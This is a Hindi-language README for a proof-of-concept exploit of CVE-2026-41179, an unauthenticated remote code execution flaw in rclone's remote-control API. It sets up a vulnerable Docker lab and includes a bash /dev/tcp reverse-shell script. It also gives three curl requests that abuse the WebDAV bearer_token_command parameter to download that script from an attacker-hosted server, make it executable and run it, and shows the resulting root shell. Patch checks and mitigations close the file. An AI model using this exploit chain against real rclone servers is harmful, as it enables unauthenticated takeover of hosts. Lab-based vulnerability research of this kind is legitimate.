
CVE-2026-41179 के लिए POC
⚠️ केवल शैक्षणिक उद्देश्यों के लिए यह रिपॉजिटरी विशेष रूप से सुरक्षा अनुसंधान, शिक्षा और अधिकृत प्रयोगशाला वातावरण के लिए है। PSSec और इस रिपॉजिटरी के योगदानकर्ता किसी भी अनधिकृत, अवैध या दुर्भावनापूर्ण उपयोग का समर्थन, अनुमोदन या कोई जिम्मेदारी नहीं लेते हैं। इस रिपॉजिटरी का उपयोग करके आप सहमत हैं कि आप अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं और आप केवल उन सिस्टमों के विरुद्ध परीक्षण करेंगे जिनके आप मालिक हैं या जिनके परीक्षण करने की लिखित अनुमति आपके पास है।
CVE-2026-41179 rclone के बिल्ट-इन रिमोट कंट्रोल (RC) API में एक गंभीर बिना प्रमाणीकरण के रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी है, जो संस्करण 1.48.0 से 1.73.4 को प्रभावित करती है।
| विवरण | मान |
|---|
| CVE | CVE-2026-41179 |
| CVSS स्कोर | 9.8 (गंभीर) |
| प्रभावित संस्करण | rclone 1.48.0 – 1.73.4 |
| पैच किया गया संस्करण | rclone 1.73.5 |
| घटक | RC API (/operations/fsinfo एंडपॉइंट) |
| हमला वेक्टर | नेटवर्क — कोई प्रमाणीकरण आवश्यक नहीं |
rclone में एक बिल्ट-इन HTTP रिमोट कंट्रोल इंटरफ़ेस (rcd) शिप किया गया है। /operations/fsinfo एंडपॉइंट एक उपयोगकर्ता-प्रदत्त fs= स्ट्रिंग स्वीकार करता है जिसे पार्स किया जाता है और एक बैकएंड को इंस्टेंशिएट करने के लिए उपयोग किया जाता है — जिसमें WebDAV बैकएंड भी शामिल है। WebDAV बैकएंड एक bearer_token_command पैरामीटर का समर्थन करता है, जो सैनिटाइज़ेशन के बिना सीधे exec.Command() को पास किया जाता है। चूँकि इस एंडपॉइंट पर डिफ़ॉल्ट रूप से किसी प्रमाणीकरण की आवश्यकता नहीं है, एक अनऑथेंटिकेटेड हमलावर rclone प्रक्रिया उपयोगकर्ता के रूप में मनमाना OS कमांड निष्पादन ट्रिगर कर सकता है।
संक्षेप में हमला श्रृंखला:
POST /operations/fsinfo (कोई प्रमाणीकरण नहीं)
→ rc.GetFs() हमलावर-नियंत्रित fs= स्ट्रिंग को पार्स करता है
→ हमलावर पैरामीटर के साथ WebDAV बैकएंड इंस्टेंशिएट होता है
→ bearer_token_command निकाला जाता है
→ exec.Command() OS कमांड फायर करता है
→ rclone प्रक्रिया उपयोगकर्ता के रूप में RCE
CVE-2026-41179/
├── Dockerfile.rclone # कमजोर rclone इमेज (v1.69.3)
├── patched.Dockerfile.rclone # पैच किया गया rclone इमेज (v1.73.5)
├── poc.sh # रिवर्स शेल पेलोड
└── instructions # चरण-दर-चरण प्रयोगशाला मार्गदर्शिका
netcatdocker build -t rclone-vuln -f Dockerfile.rclone .
Debian-slim कंटेनर बनाता है जो rclone v1.69.3 चलाता है और RC API को पोर्ट 5572 पर उजागर करता है।
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln
RC API अब http://127.0.0.1:5572 पर बिना प्रमाणीकरण के उपलब्ध है।
penelope -p 5555
# या
nc -lvnp 5555
poc.sh को संपादित करें और अपना हमलावर IP तथा सुनने वाला पोर्ट सेट करें:
#!/bin/bash
bash -i >& /dev/tcp/<हमलावर-ip>/<सुनने-वाला-पोर्ट> 0>&1
इसे poc.sh वाली डायरेक्टरी से चलाएं:
python3 -m http.server 8888
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
--data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://<हमलावर-ip>:8888/poc.sh':'
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
--data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
--data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'
अपना सुनने वाला जांचें — आपको कंटेनर से एक रूट शेल प्राप्त होना चाहिए:
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root
पैच की गई इमेज का उपयोग करके चरण 1–8 दोहराएं ताकि पुष्टि हो सके कि कमजोरी ठीक हो गई है:
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched
वही curl अनुरोध पोर्ट 5573 पर भेजें — कमांड निष्पादित नहीं होनी चाहिए।
rcd को --rc-user और --rc-pass फ्लैग के साथ शुरू करें।5572) तक नेटवर्क पहुँच प्रतिबंधित करें — इसे कभी भी अविश्वसनीय नेटवर्क पर उजागर नहीं किया जाना चाहिए।--rc-no-auth=false (पैच किए गए संस्करणों में नया डिफ़ॉल्ट) का उपयोग करने पर विचार करें।यह रिपॉजिटरी केवल शैक्षणिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है। प्रूफ-ऑफ-कॉन्सेप्ट कोड एक नियंत्रित Docker प्रयोगशाला वातावरण में एक वास्तविक कमजोरी प्रदर्शित करता है।
PSSec और सभी योगदानकर्ता:
उत्पादन सिस्टम या आपके स्वामित्व वाले सिस्टमों के विरुद्ध इस कोड का अनधिकृत उपयोग आपके अधिकार क्षेत्र में कंप्यूटर धोखाधड़ी और साइबर अपराध कानूनों का उल्लंघन कर सकता है।
CVE-2026-41179 — PSSec द्वारा अनुसंधान